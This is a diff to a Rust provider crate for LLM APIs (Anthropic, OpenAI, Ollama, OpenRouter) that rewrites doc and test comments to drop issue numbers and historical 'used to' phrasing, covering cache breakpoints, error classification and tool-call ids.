+/// This is what makes a marker that rolls forward with the conversation
+/// collapse rather than merely drift: a workload appending a dozen content
+/// blocks a turn outruns the lookback within a few turns and never gets back
+/// inside it. Measured across a run: reads climbed while the gap stayed at or
+/// below 21 blocks and died permanently at 25.
 ///
 /// Kept a little under the documented figure. Being wrong low costs one extra
 /// marker; being wrong high costs the entire conversation cache.
@@ -132,9 +131,8 @@ fn message_cache_breakpoints(block_counts: &[usize], budget: usize) -> Vec<usize
 /// match, and creating it is charged at the 1.25x write rate. So a block whose
 /// region declared itself `rewritten`, or that the runtime clears every
 /// iteration, is not a candidate - a prefix ending there is invalid by
-/// construction. This is the fix for a measured case where the sole marker sat
-/// on a six-token status line at the end of the system array, making the whole
-/// prompt uncacheable (#474).
+/// construction. Without this the sole marker can sit on a six-token status
+/// line at the end of the system array, making the whole prompt uncacheable.
 ///
 /// **Several markers cost nothing extra and find the longest match.** The API
 /// takes up to four and reads back the longest stored prefix that still
@@ -551,7 +549,7 @@ impl AnthropicProvider {
         const MAX_BREAKPOINTS: usize = 4;
 
         // Consolidate system-block cache breakpoints so a blueprint with many
-        // pinned/cached regions stays within the limit (issue #12): one
+        // pinned/cached regions stays within the limit: one
         // `cache_control` per contiguous run of same-hint cacheable blocks,
         // capped at the total budget.
         let system_breakpoints: std::collections::HashSet<usize> =
@@ -1162,7 +1160,7 @@ mod tests {
     fn a_breakpoint_on_a_tool_turn_reaches_the_wire() {
         // In an agent run nearly every message is a tool turn, and the
         // breakpoint is chosen by index, so this is where it usually lands.
-        // It used to decrement a budget of four and write nothing.
+        // Decrementing a budget of four and writing nothing is the failure.
         let content = crate::MessageContent::Blocks(vec![
             crate::provider::ContentBlock::Text {
                 text: "thinking".to_string(),
@@ -1381,7 +1379,7 @@ mod tests {
         let body = provider.build_request_body(&request);
         assert_eq!(body["model"], "claude-sonnet-4-6");
         // A single *cacheable* system block is emitted in array form so its
-        // cache_control annotation survives (issue #12 fix); the plain-string
+        // cache_control annotation survives; the plain-string
         // form is reserved for a single uncached block.
         let system = body["system"]
             .as_array()
@@ -1505,7 +1503,7 @@ mod tests {
     ///     tool_use.thought_signature: Extra inputs are not permitted
     ///
     /// Observed as a Gemini stage followed by an Anthropic one dying on its
-    /// first request, with the failing model not the one under test (#575).
+    /// first request, with the failing model not the one under test.
     #[test]
     fn a_foreign_thought_signature_never_reaches_anthropic() {
         // As a Gemini turn left it in history.
@@ -1797,7 +1795,7 @@ mod tests {
         assert!(bp_count <= 4, "never more than the API accepts: {bp_count}");
     }
 
-    // ── issue #12: system-block cache_control budget ──────────────────────────
+    // ── system-block cache_control budget ─────────────────────────────────────
 
     /// Blocks carrying only the hints under test, all eligible - these tests
     /// are about how runs are grouped, not about what held still.
@@ -1848,7 +1846,7 @@ mod tests {
 
     /// A block that changes every turn can never be the end of a readable
     /// prefix, so a marker there is a 1.25x write for an entry nothing reads.
-    /// This is the measured case from #474: the sole marker sat past the churn.
+    /// The measured case: the sole marker sits past the churn.
     #[test]
     fn a_rewritten_block_is_never_a_candidate() {
         let mut blocks = blocks_of(&[leviath_core::CacheHint::Always; 3]);
@@ -1922,7 +1920,7 @@ mod tests {
     #[test]
     fn build_request_body_caps_total_cache_control_at_4_with_many_system_regions() {
         use leviath_core::CacheHint;
-        // issue #12 regression: 5 cacheable system regions (architecture/
+        // 5 cacheable system regions (architecture/
         // program_flows/plan/task pinned + files hashmap) must consolidate
         // within the 4-block total `cache_control` budget; emitting 5
         // `cache_control` blocks is a hard Anthropic 400.
@@ -3347,7 +3345,7 @@ mod tests {
         let provider = provider_with_url(url);
         let err = provider.list_models().await.unwrap_err();
         // A rejected key is the provider's problem, not a flaky connection:
-        // it must not classify as transient (issue #201).
+        // it must not classify as transient.
         assert_eq!(
             err.unavailable_reason(),
             Some(crate::provider::UnavailableReason::AuthFailed)
@@ -3654,7 +3652,7 @@ mod tests {
     /// A marker placed relative to the *end* fails this - it moves every turn by
     /// however much the turn appended, and once that step exceeds the lookback
     /// the lookup can never reach the previous entry again. That is absorbing,
-    /// because the step does not shrink, and it is the fault behind #474.
+    /// because the step does not shrink, and it is what the anchoring avoids.
     #[test]
     fn a_growing_conversation_keeps_a_marker_where_the_last_one_was() {
         // Each turn appends a dozen-plus content blocks, as a parallel read
@@ -3880,9 +3878,9 @@ mod learned_tests {
         .with_base_url(Some(url))
     }
 
-    /// The endpoint pages at twenty by default and this used to read one page,
-    /// so a catalogue past that was silently short. Both pages land now, and
-    /// the limits the listing reports outrank the table's.
+    /// The endpoint pages at twenty by default, so reading one page leaves a
+    /// catalogue past that silently short. Both pages have to land, and the
+    /// limits the listing reports outrank the table's.
     #[tokio::test]
     async fn priming_reads_every_page_and_what_each_says() {
         let page_one = br#"{"data":[

--- a/crates/leviath-providers/src/anthropic/catalog.rs
+++ b/crates/leviath-providers/src/anthropic/catalog.rs
@@ -7,8 +7,7 @@
 //! default page is twenty entries and the cap is a thousand, so a reader that
 //! takes one page at the default silently truncates once the catalogue grows.
 //!
-//! This build's comment on `LimitsSource::Builtin` used to say the endpoint
-//! reports nothing about size. It does now, and this is where that is read.
+//! The endpoint does report size, and this is where it is read.
 
 use crate::learned::{LearnedModel, unix_seconds_from_rfc3339};
 

--- a/crates/leviath-providers/src/capabilities.rs
+++ b/crates/leviath-providers/src/capabilities.rs
@@ -98,8 +98,7 @@ pub(crate) fn lookup(table: &[Row], model: &str, fallback: ModelCapabilities) ->
 /// enumerate anything; a listing wants rows. Each provider names the handful
 /// of models worth showing when its listing cannot be reached, and resolves
 /// their capabilities through its own table, so a row here and an inference
-/// against the same id cannot disagree. This replaced a second, hand-kept
-/// table in the CLI whose numbers had drifted from these (#568).
+/// against the same id cannot disagree.
 #[derive(Debug, Clone, PartialEq, Eq)]
 pub struct CatalogEntry {
     /// The provider that serves it.
@@ -202,9 +201,9 @@ pub enum LimitsSource {
     ///
     /// The default, and the honest answer for a provider whose API does not
     /// report limits at all: OpenAI's `/v1/models` returns an id, a date and
-    /// an owner and nothing about size. (Anthropic's used to say nothing
-    /// either; measured in 2026-08 it reports `max_input_tokens` and
-    /// `max_tokens`, and `crate::anthropic` reads them.) It is also the answer
+    /// an owner and nothing about size. (Anthropic's does report
+    /// `max_input_tokens` and `max_tokens`, and `crate::anthropic` reads
+    /// them.) It is also the answer
     /// when a provider that *could* say has not been asked yet, since
     /// `prime_capabilities` runs at daemon start-up and a short-lived command
     /// may not have waited for it.
@@ -240,9 +239,9 @@ impl Default for ModelCapabilities {
 ///
 /// Every field is optional and unset means "leave it alone", so an entry names
 /// only what it is correcting. The alternative - deserializing straight into
-/// [`ModelCapabilities`] - has two failure modes, and this repo has now seen
-/// both. Without field defaults a partial table fails to deserialize and the
-/// override is dropped in silence (#338). With `#[serde(default)]` it succeeds
+/// [`ModelCapabilities`] - has two failure modes. Without field defaults a
+/// partial table fails to deserialize and the override is dropped in
+/// silence. With `#[serde(default)]` it succeeds
 /// and quietly substitutes [`ModelCapabilities::default`] for everything the
 /// operator did not mention, so correcting one boolean would drop a 400 000
 /// token window to 8 192.

--- a/crates/leviath-providers/src/endpoint.rs
+++ b/crates/leviath-providers/src/endpoint.rs
@@ -666,9 +666,9 @@ mod tests {
         assert!(provider.warned_unknown.is_empty());
     }
 
-    /// The entry's timeout bounds the listing. It used to stamp the 30 s
-    /// side-call default on the request, which beats any client-level timeout,
-    /// so a 1 s entry against a server that never answers waited 30 s.
+    /// The entry's timeout bounds the listing. Stamping the 30 s side-call
+    /// default on the request beats any client-level timeout, so a 1 s entry
+    /// against a server that never answers would wait 30 s.
     #[tokio::test]
     async fn the_listing_is_bounded_by_the_entry_timeout_not_the_side_call_default() {
         let listener = tokio::net::TcpListener::bind("127.0.0.1:0")

--- a/crates/leviath-providers/src/failure.rs
+++ b/crates/leviath-providers/src/failure.rs
@@ -12,11 +12,12 @@ use crate::provider::ProviderError;
 /// What actually went wrong when a provider call failed, at the granularity a
 /// person debugging it needs.
 ///
-/// The remedy differs per variant and nothing else in the error carries it. A
-/// failed call used to arrive as one of two strings - a transport failure or an
-/// HTTP status - and "could not reach the provider" covered a wrong base URL, a
-/// firewall, an expired certificate and a laptop that had gone to sleep. Each
-/// wants a different thing done about it, and the message was the same.
+/// The remedy differs per variant and nothing else in the error carries it.
+/// Without this a failed call arrives as one of two strings - a transport
+/// failure or an HTTP status - and "could not reach the provider" covers a
+/// wrong base URL, a firewall, an expired certificate and a laptop that has
+/// gone to sleep. Each wants a different thing done about it, and the message
+/// is the same.
 ///
 /// Recorded on the error, logged as a field, and reported by the API, so the
 /// question "was that my key, my URL, or their outage" has an answer that does
@@ -217,11 +218,11 @@ fn io_error_kind(e: &(dyn std::error::Error + 'static)) -> Option<std::io::Error
 /// The kind is tried first because it is portable. Text is the fallback, and it
 /// carries the cases the standard library has no kind for - a name that did not
 /// resolve and a handshake that failed both arrive as `Uncategorized` or as no
-/// `io::Error` at all. Those phrases are ones these libraries really emit, taken
-/// from measured failures: an earlier version looked for "tls" and "certificate"
-/// and caught neither, because rustls answers a plaintext port with "received
-/// corrupt message of type invalidcontenttype", which contains no word anyone
-/// would think to search for.
+/// `io::Error` at all. Those phrases are ones these libraries really emit,
+/// taken from measured failures: the obvious "tls" and "certificate" catch
+/// neither, because rustls answers a plaintext port with "received corrupt
+/// message of type invalidcontenttype", which contains no word anyone would
+/// think to search for.
 fn connect_failure(io: Option<std::io::ErrorKind>, chain: &str) -> FailureKind {
     use std::io::ErrorKind;
 
@@ -285,7 +286,7 @@ fn error_chain_text(e: &dyn std::error::Error) -> String {
 impl ProviderError {
     /// A transport failure, with what `reqwest` knew about it kept.
     ///
-    /// Every one of these used to be `RequestFailed(e.to_string())`, and
+    /// As a bare `RequestFailed(e.to_string())` these are indistinguishable:
     /// `Display` on a `reqwest::Error` says the same sentence for a hostname
     /// that does not resolve, a port with nothing behind it, and a certificate
     /// nobody trusts. The kind is worked out here, where the typed error still

--- a/crates/leviath-providers/src/learned.rs
+++ b/crates/leviath-providers/src/learned.rs
@@ -4,10 +4,9 @@
 //! table is out of date the day it ships: `gpt-5.5` refused a temperature the
 //! table said it took, the OpenRouter section had no `claude-*-5` rows while
 //! the gateway plainly served them, and a comparison set picked from the table
-//! was a generation behind what the gateway had (#568). Each provider already
-//! calls the one endpoint that knows better and kept a private map of a
-//! different shape for what it chose to keep: sizes here, prices there, ids
-//! somewhere else. This is the one shape they all fill now.
+//! was a generation behind what the gateway had. Each provider already calls
+//! the one endpoint that knows better; this is the one shape they all fill, so
+//! sizes, prices and ids do not each end up in a private map of their own.
 //!
 //! The rule for a field is: `None` means "this provider's listing has no such
 //! field", never "no". OpenAI's `/v1/models` says nothing about size, so an

--- a/crates/leviath-providers/src/ollama.rs
+++ b/crates/leviath-providers/src/ollama.rs
@@ -36,18 +36,17 @@ pub struct OllamaProvider {
 
 /// A tool-call id unique for the life of a conversation.
 ///
-/// Ollama sends no ids of its own, so these are minted here - and the mint used
-/// to be the call's index within one response, which restarts at 0 every turn.
-/// A window ten turns deep therefore held ten distinct calls all named
-/// `ollama_0`.
+/// Ollama sends no ids of its own, so these are minted here, and they have to
+/// be unique across the conversation rather than within one response: a
+/// per-response index restarts at 0 every turn, so a window ten turns deep
+/// holds ten distinct calls all named `ollama_0`.
 ///
 /// That is not cosmetic. `drop_unpaired_tool_turns` pairs a call with its
 /// response *by id*, to keep a window that has evicted half a pair from putting
-/// a malformed conversation on the wire. With every id equal, every call looked
-/// answered and every response looked called, so the guard never removed
-/// anything for this provider (issue #470) - and a response stranded by
-/// eviction survived at the head of the conversation, which is what suppressed
-/// the inserted user turn in #469.
+/// a malformed conversation on the wire. With every id equal, every call looks
+/// answered and every response looks called, the guard removes nothing, and a
+/// response stranded by eviction survives at the head of the conversation,
+/// where it suppresses the inserted user turn.
 ///
 /// The sequence is process-wide rather than per-response, and carries a prefix
 /// minted once per process, because a run outlives the daemon: a pause and
@@ -312,9 +311,8 @@ impl OllamaProvider {
     /// A request past `num_ctx` is not refused. The server truncates it from the
     /// front until it fits, and when what falls off the front is the last user
     /// turn it then reports `no user query found in messages` - a message about
-    /// the shape of the conversation, describing a failure of its size. That
-    /// sent two separate investigations after message-shape bugs before a wire
-    /// capture settled it (issues #469, #475, #485).
+    /// the shape of the conversation, describing a failure of its size. It
+    /// reads as a message-shape bug and is not one.
     ///
     /// The test is exact rather than a threshold: if this request carried a user
     /// message and the server says it received none, the server dropped it, and
@@ -754,7 +752,7 @@ impl Provider for OllamaProvider {
     /// four times the 32768 it is actually served at. Budgets sized against the
     /// larger number never evict, the request overflows, and Ollama front-
     /// truncates it and then answers `no user query found in messages`, which
-    /// names neither the size nor the truncation (issue #475).
+    /// names neither the size nor the truncation.
     ///
     /// Failure is a warning upstream, not an error: a daemon whose Ollama is not
     /// running must still start, with the compiled table in charge.
@@ -958,7 +956,7 @@ fn ollama_chunk(json: &serde_json::Value) -> StreamChunk {
 /// NDJSON promises a newline between records, not after the last one, so a
 /// final `done` record can be sitting in the buffer with nothing to frame
 /// it. It is read as text and the stream is marked complete; the usage on it
-/// is not recovered, which is what the old loop did too.
+/// is not recovered.
 fn ollama_flush(buffer: &mut String) -> Option<StreamChunk> {
     let remaining = buffer.trim().to_string();
     if remaining.is_empty() {
@@ -2871,9 +2869,9 @@ mod tests {
     /// `think` is Ollama's top-level switch for a reasoning model, not a
     /// sampling knob - buried under `options` it would be silently ignored,
     /// and the model would keep spending its budget reasoning.
-    /// The bug in #470: two *different* turns each naming their first call
-    /// `ollama_0`, so a conversation held distinct calls that were
-    /// indistinguishable by id.
+    /// Two *different* turns must not each name their first call `ollama_0`,
+    /// or a conversation holds distinct calls that are indistinguishable by
+    /// id.
     #[test]
     fn ids_do_not_repeat_across_responses() {
         let provider = OllamaProvider::new(
@@ -2913,11 +2911,11 @@ mod tests {
         );
     }
 
-    /// What the unique ids buy downstream, and the reason #470 mattered rather
-    /// than merely being untidy: with the index-based mint, a response stranded
-    /// by eviction shared an id with an unrelated later call, so
-    /// `drop_unpaired_tool_turns` considered it answered and kept it. Keeping it
-    /// is what put a `tool` message at the head of the conversation in #469.
+    /// What the unique ids buy downstream, and why a repeated id is more than
+    /// untidy: a response stranded by eviction that shares an id with an
+    /// unrelated later call makes `drop_unpaired_tool_turns` consider it
+    /// answered and keep it, which puts a `tool` message at the head of the
+    /// conversation.
     #[test]
     fn a_stranded_response_is_dropped_now_that_ids_differ() {
         let provider = OllamaProvider::new(
@@ -3488,7 +3486,7 @@ mod tests {
     }
 
     /// The trap this exists to avoid. `model_info` names the architecture's
-    /// ceiling, which on the model that prompted #475 is 262144 against a real
+    /// ceiling, which on the model in this fixture is 262144 against a real
     /// window of 32768 - so reading the obvious field would replace one
     /// overestimate with a bigger one.
     #[test]

--- a/crates/leviath-providers/src/openai.rs
+++ b/crates/leviath-providers/src/openai.rs
@@ -1202,7 +1202,7 @@ mod tests {
 
     // ─── Tools refused over a reasoning effort ──────────────────────────────
 
-    /// Verbatim from `api.openai.com`, captured while reproducing #333.
+    /// Verbatim from `api.openai.com`.
     const TOOLS_REFUSED: &[u8] = br#"{"error":{"message":"Function tools with reasoning_effort are not supported for gpt-5.6-terra in /v1/chat/completions. To use function tools, use /v1/responses or set reasoning_effort to 'none'.","type":"invalid_request_error","param":"reasoning_effort","code":null}}"#;
 
     const OK_BODY: &[u8] = br#"{"choices":[{"message":{"content":"hi there"},"finish_reason":"stop"}],"usage":{"prompt_tokens":3,"completion_tokens":2}}"#;

--- a/crates/leviath-providers/src/openai_compat.rs
+++ b/crates/leviath-providers/src/openai_compat.rs
@@ -1308,7 +1308,7 @@ mod tests {
 
     /// The window holding nothing but the assistant's own prose. No tool call,
     /// so `satisfy_call_turn_order` does not fire and this is the shape that
-    /// reached Ollama without a user turn (issue #469).
+    /// reaches Ollama without a user turn.
     #[test]
     fn a_conversation_of_only_assistant_prose_gains_a_user_turn() {
         let request = InferenceRequest {
@@ -1445,12 +1445,12 @@ mod tests {
         assert_eq!(roles, vec!["user", "assistant"]);
     }
 
-    /// The shape issue #469 dies on, and the one the other two passes miss.
+    /// The shape the other two passes miss.
     ///
     /// A sliding window that has evicted a call turn but kept its response
     /// leaves that response stranded at the head. It is normally dropped as an
     /// orphan - except against Ollama, which restarts tool-call ids at
-    /// `ollama_0` every turn (#470), so a *later* turn's call puts that id in
+    /// `ollama_0` every turn, so a *later* turn's call puts that id in
     /// `called` and the stranded response looks answered.
     ///
     /// The conversation then opens on a `tool` message, so when the first real
@@ -1891,8 +1891,8 @@ mod tests {
                 "prompt_tokens_details": {
                     "cached_tokens": 80,
                     // Reported by gateways fronting a provider that charges a
-                    // write premium. It used to be dropped, so a run paying the
-                    // 1.25x rate recorded none of it.
+                    // write premium. Dropping it leaves a run paying the
+                    // 1.25x rate recording none of it.
                     "cache_write_tokens": 15
                 }
             }
@@ -2243,8 +2243,8 @@ mod tests {
         // A stream is where OpenRouter reports a failure it only found after
         // committing to a 200 - the upstream provider going down, or the
         // account draining between chunks. It has no `choices` and no `usage`,
-        // so it used to fall through to `continue` and simply end the stream:
-        // a truncated answer with nothing anywhere saying why.
+        // so without this it falls through to `continue` and simply ends the
+        // stream: a truncated answer with nothing anywhere saying why.
         let mut buf = format!(
             "data: {}\n\n",
             serde_json::json!({
@@ -3027,8 +3027,8 @@ mod tests {
         );
     }
 
-    /// One block list carrying both a call and its result must emit both; the
-    /// results used to be dropped, producing the unanswered-call shape.
+    /// One block list carrying both a call and its result must emit both;
+    /// dropping the result produces the unanswered-call shape.
     #[test]
     fn a_block_with_both_a_call_and_its_result_emits_both() {
         let content = MessageContent::Blocks(vec![

--- a/crates/leviath-providers/src/openrouter.rs
+++ b/crates/leviath-providers/src/openrouter.rs
@@ -54,16 +54,15 @@ pub struct OpenRouterProvider {
     ///
     /// OpenRouter fronts hundreds of models and this build's table names a few
     /// dozen, so the table is out of date the day it ships and an unlisted
-    /// model silently got a conservative 128 000 tokens. Region budgets are
-    /// percentages of the window, so that sized a `budget = "30%"` region on a
-    /// 1M-token model at 38 400 instead of 314 572 (#337, #360). The same
-    /// listing says whether a model takes a temperature or tools, what it
-    /// charges, and whether its upstream bills a cache write (#568); all of it
-    /// is kept now, and [`Self::capabilities`] answers from it.
+    /// model falls back to a conservative 128 000 tokens. Region budgets are
+    /// percentages of the window, so that sizes a `budget = "30%"` region on a
+    /// 1M-token model at 38 400 instead of 314 572. The same listing says
+    /// whether a model takes a temperature or tools, what it charges, and
+    /// whether its upstream bills a cache write; all of it is kept, and
+    /// [`Self::capabilities`] answers from it.
     ///
     /// Empty until primed, and empty forever if the endpoint could not be
-    /// reached - both mean "fall back to the built-in table", which is what
-    /// happened before this existed.
+    /// reached - both mean "fall back to the built-in table".
     learned: LearnedModels,
 }
 
@@ -74,9 +73,9 @@ impl OpenRouterProvider {
     /// upstream that bills a write expects a marker, and one that quotes only
     /// a read price caches by prefix on its own and may charge extra for the
     /// marker (see [`crate::learned::LearnedModel::explicit_cache_control`]).
-    /// Before priming, or for a model the listing omits, the old rule stands:
-    /// Anthropic and Google read markers and everyone else is sent plain
-    /// text so an unknown field cannot be refused.
+    /// Before priming, or for a model the listing omits, the fallback rule
+    /// stands: Anthropic and Google read markers and everyone else is sent
+    /// plain text so an unknown field cannot be refused.
     fn explicit_cache_control(&self, model: &str) -> bool {
         self.learned
             .get(model)
@@ -488,18 +487,6 @@ impl OpenRouterProvider {
         self.temperature_unsupported.insert(model);
     }
 
-    /// Say so when a model fell through to [`FALLBACK_CAPABILITIES`].
-    ///
-    /// OpenRouter fronts hundreds of models and this build's table names a few
-    /// dozen, so an unlisted model is ordinary rather than exceptional - and it
-    /// silently got a 128 000-token window. Region budgets are percentages of
-    /// that window, so a `budget = "30%"` region on a model that really has
-    /// 1M tokens was being sized at 38 400 instead of 314 572: no error, no
-    /// warning, just an agent that evicts working material early and looks like
-    /// a worse model.
-    ///
-    /// Reported once per model rather than per inference, and it names the
-    /// stanza that fixes it, which is now a partial entry (#338).
     /// GET `/models`, shared by [`Provider::list_models`] and
     /// [`Provider::prime_capabilities`] so the two cannot disagree about what
     /// the endpoint is or how its failures read.
@@ -531,6 +518,18 @@ impl OpenRouterProvider {
         crate::provider::decode_json(response).await
     }
 
+    /// Say so when a model falls through to [`FALLBACK_CAPABILITIES`].
+    ///
+    /// OpenRouter fronts hundreds of models and this build's table names a few
+    /// dozen, so an unlisted model is ordinary rather than exceptional - and
+    /// it gets a 128 000-token window. Region budgets are percentages of that
+    /// window, so a `budget = "30%"` region on a model that really has 1M
+    /// tokens is sized at 38 400 instead of 314 572: no error, no warning,
+    /// just an agent that evicts working material early and looks like a
+    /// worse model.
+    ///
+    /// Reported once per model rather than per inference, and it names the
+    /// stanza that fixes it, which may be a partial entry.
     fn warn_if_unknown(&self, model: &str, resolved: &ModelCapabilities) {
         if resolved.max_context_tokens != FALLBACK_CAPABILITIES.max_context_tokens {
             return;
@@ -1049,7 +1048,7 @@ mod tests {
         assert!(provider.max_context_tokens("meta-llama/llama-4-scout") > 128_000);
     }
 
-    // ─── The conservative fallback is no longer silent ──────────────────────
+    // ─── The conservative fallback is not silent ────────────────────────────
 
     #[test]
     fn a_known_model_keeps_its_own_window() {
@@ -1367,10 +1366,10 @@ mod tests {
     /// A stable system block carries a marker, so an Anthropic model reached
     /// through the gateway can cache its prefix at all.
     ///
-    /// System blocks used to be pushed as plain strings whatever the model, so
-    /// nothing marked the one part of the request worth caching - the stage
-    /// prompt and the pinned regions. Two research runs read zero tokens from
-    /// cache across 2.9M and 5.9M input tokens because of it.
+    /// Pushing system blocks as plain strings whatever the model leaves
+    /// nothing marking the one part of the request worth caching - the stage
+    /// prompt and the pinned regions. Two research runs measured zero cache
+    /// reads across 2.9M and 5.9M input tokens that way.
     #[test]
     fn a_stable_system_block_is_marked_for_an_anthropic_model() {
         let provider = OpenRouterProvider::new(
@@ -1830,12 +1829,12 @@ mod tests {
         assert_eq!(chunk.delta, "hi");
     }
 
-    // ─── Windows come from the API, not the compiled table (#360) ────────────
+    // ─── Windows come from the API, not the compiled table ───────────────────
 
-    /// The reported case, end to end: a model this build's table does not name,
-    /// which OpenRouter says has a 1M-token window. Before priming it resolved
-    /// to the 128 000-token fallback, and every percentage region budget was
-    /// sized against that.
+    /// End to end: a model this build's table does not name, which OpenRouter
+    /// says has a 1M-token window. Without priming it resolves to the 128 000
+    /// token fallback, and every percentage region budget is sized against
+    /// that.
     #[tokio::test]
     async fn priming_takes_the_window_from_the_models_api() {
         let body = br#"{"data":[{"id":"moonshotai/kimi-k3","context_length":1048576,"top_provider":{"max_completion_tokens":32768}}]}"#;

--- a/crates/leviath-providers/src/pricing.rs
+++ b/crates/leviath-providers/src/pricing.rs
@@ -709,8 +709,8 @@ mod cost_tests {
         assert_eq!(totals.unpriced_calls, 1);
     }
 
-    /// Every count arrives from a provider response. A gateway reporting a
-    /// nonsense `prompt_tokens` used to abort the daemon in the constructor.
+    /// Every count arrives from a provider response, so a gateway reporting a
+    /// nonsense `prompt_tokens` must not abort the daemon in the constructor.
     #[test]
     fn token_usage_saturates_instead_of_aborting() {
         let usage = TokenUsage::new(usize::MAX, 1, 1, 1);

--- a/crates/leviath-providers/src/provider.rs
+++ b/crates/leviath-providers/src/provider.rs
@@ -20,7 +20,7 @@ pub type Result<T> = std::result::Result<T, ProviderError>;
 /// to a smaller request will fix: the account is out of money, or the key is
 /// wrong. Keeping them apart from a generic [`ProviderError::ApiError`] is what
 /// lets the runtime fail over to another provider and trip a circuit breaker
-/// instead of killing every run with a raw JSON blob (issue #201).
+/// instead of killing every run with a raw JSON blob.
 #[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
 #[serde(rename_all = "snake_case")]
 pub enum UnavailableReason {
@@ -110,8 +110,7 @@ impl UnavailableReason {
     /// A Rhai script provider throws `#{ kind: "api", message: "HTTP 402 ..." }`
     /// and hands us the whole thing as one string, so the status has to be read
     /// back out of it. A script talking to an OpenAI-compatible endpoint must
-    /// fail over and trip the breaker exactly as the built-in providers do
-    /// (issue #201).
+    /// fail over and trip the breaker exactly as the built-in providers do.
     pub fn from_message(message: &str) -> Option<Self> {
         Self::classify(leading_http_status(message).unwrap_or(0), message)
     }
@@ -185,7 +184,7 @@ pub enum ProviderError {
     RateLimitExceeded {
         /// What the provider's `Retry-After` header asked for, in seconds, when
         /// it sent one. Carried out of the provider layer so the retry loop can
-        /// wait as long as the server said instead of guessing (issue #417).
+        /// wait as long as the server said instead of guessing.
         retry_after_secs: Option<u64>,
     },
 
@@ -213,8 +212,8 @@ pub enum ProviderError {
 /// Kept apart from [`SERVER_ERROR_SIGNALS`] because the two deserve different
 /// waits. A 500 or a dropped connection is a blip that a second or two clears;
 /// a capacity refusal is a window that lasts minutes, and retrying it on
-/// blip-sized backoff just spends the attempts without ever leaving the window
-/// (issue #417).
+/// blip-sized backoff just spends the attempts without ever leaving the
+/// window.
 const CAPACITY_SIGNALS: [&str; 5] = [
     // Rate limiting (a provider that maps 429 to ApiError rather than
     // RateLimitExceeded, e.g. Ollama).
@@ -251,7 +250,7 @@ fn mentions_any(message: &str, signals: &[&str]) -> bool {
 /// provider running out of capacity and whether the server said when to come
 /// back, and neither survives being flattened into an error string. Carrying
 /// both here is what lets the dispatch layer honor a `Retry-After` and back off
-/// on a capacity-sized schedule rather than a blip-sized one (issue #417).
+/// on a capacity-sized schedule rather than a blip-sized one.
 #[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
 pub struct RetryAdvice {
     /// Whether the provider refused for want of capacity (429, or a 529
@@ -476,15 +475,15 @@ pub enum ContentBlock {
         /// which, with per-stage models, is routinely a different one. Anthropic
         /// rejects the unknown key outright (`tool_use.thought_signature: Extra
         /// inputs are not permitted`), so a Gemini stage followed by an
-        /// Anthropic stage died on its first request (issue #575).
+        /// Anthropic stage dies on its first request.
         ///
         /// A provider that wants it emits it deliberately rather than getting
         /// it by default: `openai_compat` already does exactly that when
         /// building its tool calls, which is why the OpenAI-shaped path
         /// (Gemini included) keeps working. The field stays on the struct - it
         /// is still needed in memory and still persisted through
-        /// `SerializedToolCall` - it just no longer leaks into a body nobody
-        /// asked to put it in.
+        /// `SerializedToolCall` - it just never reaches a body nobody asked to
+        /// put it in.
         #[serde(default, skip_serializing)]
         thought_signature: Option<String>,
     },
@@ -973,8 +972,6 @@ pub(crate) fn parse_tool_arguments(raw: &str) -> serde_json::Value {
 /// What a provider learns about a model by being refused (no temperature,
 /// no tools over a reasoning effort) or by warning about it once is worth
 /// keeping across requests, and clones of the provider share the same set.
-/// Five fields across three providers used to spell this out as
-/// `Arc<Mutex<HashSet<String>>>` with a pair of lock-and-look helpers each.
 #[derive(Debug, Clone, Default)]
 pub(crate) struct ModelMemo(std::sync::Arc<std::sync::Mutex<std::collections::HashSet<String>>>);
 
@@ -1037,7 +1034,7 @@ pub(crate) async fn check_http_response(
         }
         // The hint rides along on the error: the client-side limiter paces the
         // *next* request, while the dispatch layer's retry loop is what decides
-        // how long this one waits before trying again (issue #417).
+        // how long this one waits before trying again.
         return Err(ProviderError::RateLimitExceeded {
             retry_after_secs: retry_after,
         });
@@ -1190,7 +1187,7 @@ mod tests {
         // round-tripping form is the number itself, not a rounded one.
         assert_eq!(json_number(0.125f32).to_string(), "0.125");
 
-        // What it used to do, and what Z.AI refused.
+        // What the plain conversion produces, and what Z.AI refused.
         let widened = serde_json::json!(0.7f32);
         assert_eq!(widened.to_string(), "0.699999988079071");
         assert_ne!(json_number(0.7f32).to_string(), widened.to_string());
@@ -1395,7 +1392,7 @@ mod tests {
         );
     }
 
-    // ─── Retry advice (issue #417) ──────────────────────────────────────────
+    // ─── Retry advice ───────────────────────────────────────────────────────
 
     #[test]
     fn a_capacity_refusal_is_told_apart_from_an_ordinary_server_failure() {
@@ -1458,7 +1455,7 @@ mod tests {
         assert_eq!(advice.retry_after_secs, None);
     }
 
-    // ─── Provider-fatal classification (issue #201) ─────────────────────────
+    // ─── Provider-fatal classification ──────────────────────────────────────
 
     /// A labelled message still classifies. The `[kind]` prefix goes in front
     /// of the status, and a prefix that hid it would have silently stopped a 402
@@ -1484,13 +1481,13 @@ mod tests {
 
     /// A resolver that answers every name with a lookup failure.
     ///
-    /// The DNS half of the test below used to ask the real resolver for a name
-    /// under `.invalid`. That is a network round trip, and on a macOS runner
-    /// whose resolver was slow the two-second request deadline fired first, so
-    /// the error came back as `Timeout` and the test failed on nothing to do
-    /// with the code under test. What the test needs is the error `reqwest`
-    /// builds when a lookup fails, and the resolver hook produces exactly that
-    /// one, on the same wrapper the system resolver's failure travels in.
+    /// Asking the real resolver for a name under `.invalid` is a network round
+    /// trip, and on a macOS runner whose resolver is slow the two-second
+    /// request deadline fires first: the error comes back as `Timeout` and the
+    /// test fails on nothing to do with the code under test. What the test
+    /// needs is the error `reqwest` builds when a lookup fails, and the
+    /// resolver hook produces exactly that one, on the same wrapper the system
+    /// resolver's failure travels in.
     struct NeverResolves;
 
     impl reqwest::dns::Resolve for NeverResolves {
@@ -1502,9 +1499,9 @@ mod tests {
         }
     }
 
-    /// Against the real client stack, because this is the whole point: these
-    /// used to arrive as one string and `Display` on a `reqwest::Error` says the
-    /// same sentence for both of them.
+    /// Against the real client stack, because this is the whole point: untold
+    /// apart these arrive as one string, and `Display` on a `reqwest::Error`
+    /// says the same sentence for both of them.
     ///
     /// Which kind a dead port produces is the OS's business and not the same
     /// everywhere - a Windows runner drops the SYN and the request times out
@@ -1794,8 +1791,8 @@ mod tests {
 
     #[test]
     fn unavailable_display_leads_with_the_remedy_and_keeps_the_detail() {
-        // The whole complaint in issue #201 was a raw JSON blob as the run's
-        // status. The message must say what to do; the blob stays available.
